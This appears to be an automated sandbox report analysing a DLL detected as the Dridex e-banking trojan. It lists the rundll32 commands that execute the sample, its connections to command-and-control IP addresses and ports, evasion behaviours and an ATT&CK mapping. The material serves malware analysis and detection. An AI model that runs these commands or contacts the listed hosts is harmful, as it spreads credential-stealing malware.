                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:45 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:46 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:49 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:50 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:53 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:54 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:57 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:58 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:01:00 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | HTTP traffic detected: POST / HTTP/1.1; Host: 192.46.210.220; Content-Length: 4862; Connection: Close; Cache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F0139F9 InternetReadFile,
                      Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49747 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49749 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:50129 version: TLS 1.2
                      Source: loaddll32.exe, 00000000.00000002.872614352.000000000154B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Dridex unpacked file
                      Detected Dridex e-Banking trojan
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EFE51A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF67C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F003B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFB6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF8EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F009B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFF6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFE6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF96D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F001730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF8AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFAE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFE9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFA660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F007FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFECA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFE3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F000220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF83C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F001240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F007660
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F002E60
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF5B60
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFFBF50
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F0026B0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F001EB0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F003EC0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F00FA10
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F0062F0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF98DA
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFEACD0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFFA0D0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF88C0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF8CC0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFFE0A0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F00D180
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFFD030
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F0089F0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F0071F0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F001020
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFFFDD0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFEF9A0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFFC590
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFFD980
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFE1570
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF7564
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F004CA0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F0050A0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F00DCA0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F005CB0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_0074096F
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_00746845
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_007462A6
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF22A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F00BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll ReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll'
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engine Classification label: mal88.bank.troj.evad.winDLL@11/0@0/4
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.19927 Joe Sandbox Cloud Basic: Detection: clean Score: 0
                      Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll Static file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.906753270.000000006F0A7000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.905694712.000000006F0A7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.8232.dll
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_014AC7B8 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_00740361 push ss; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_00746A2B push 00000078h; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_00741ED7 push cs; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_00740FA7 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_0074149A push eax; retf 006Ch
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_3_00740B87 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
                      Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\loaddll32.exe Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F00CEF8 FindFirstFileExW,
                      Source: loaddll32.exe, 00000000.00000002.872703373.00000000015AB000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWw
                      Source: rundll32.exe, 00000003.00000003.490201324.000000000072C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW8
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.490201324.000000000072C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

                      Anti Debugging:

                      Found potential dummy code loops (likely to delay analysis)
                      Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 90% for more than 60s
                      Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF6C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF7A60 RtlAddVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.873263052.0000000001CD0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.885731516.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.873263052.0000000001CD0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.885731516.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.873263052.0000000001CD0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.885731516.0000000003360000.00000002.00020000.sdmp Binary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000000.00000002.873263052.0000000001CD0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.885731516.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6EFF2980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 112 | Virtualization/Sandbox Evasion 11 | Input Capture 1 | Security Software Discovery 11 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 112 | LSASS Memory | Virtualization/Sandbox Evasion 11 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rundll32 1 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 13 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      SecuriteInfo.com.Variant.Razy.980776.8232.dll | 6% | Virustotal |
                      SecuriteInfo.com.Variant.Razy.980776.8232.dll | 18% | ReversingLabs | Win32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs


                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      https://192.46.210.220/ | true | URL Reputation: safe | unknown

                      URLs from Memory and Binaries

                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/5loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/Vloaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Cloaddll32.exe, 00000000.00000003.771239473.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.554460856.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/0yrundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/4.140.214:808/loaddll32.exe, 00000000.00000003.577869805.00000000015B8000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Grundll32.exe, 00000003.00000002.874095121.00000000006C0000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47/Rloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/08/rundll32.exe, 00000003.00000003.487957725.000000000073F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/em32rundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Srundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Qrundll32.exe, 00000003.00000003.493682410.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Oloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exefalse
                      • URL Reputation: safe
                      unknown
                      https://185.56.219.47:8116/.loaddll32.exe, 00000000.00000003.577869805.00000000015B8000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.519473645.0000000000739000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/Yloaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/-rundll32.exe, 00000003.00000003.554460856.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47/crundll32.exe, 00000003.00000003.493682410.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Wloaddll32.exe, 00000000.00000003.845510085.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/3rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/0loaddll32.exe, 00000000.00000003.535107117.00000000015B7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.490150806.0000000000713000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Vrundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/en-USloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/crundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpfalse
                        unknown
                        https://192.46.210.220/dloaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/5rundll32.exe, 00000003.00000003.489963534.000000000073E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/-rundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/ll&rundll32.exe, 00000003.00000003.562908687.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/?loaddll32.exe, 00000000.00000003.677056521.00000000015B8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/jrundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/Crundll32.exe, 00000003.00000003.657662148.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/Dloaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.657662148.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/rrundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/nloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/hyloaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://185.56.219.47:8116/lltloaddll32.exe, 00000000.00000003.496791595.00000000015BF000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.496791595.00000000015BF000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.744898408.00000000015C0000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://45.77.0.96/loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://185.56.219.47:8116/lloaddll32.exe, 00000000.00000003.704163950.00000000015B9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/graphyrundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
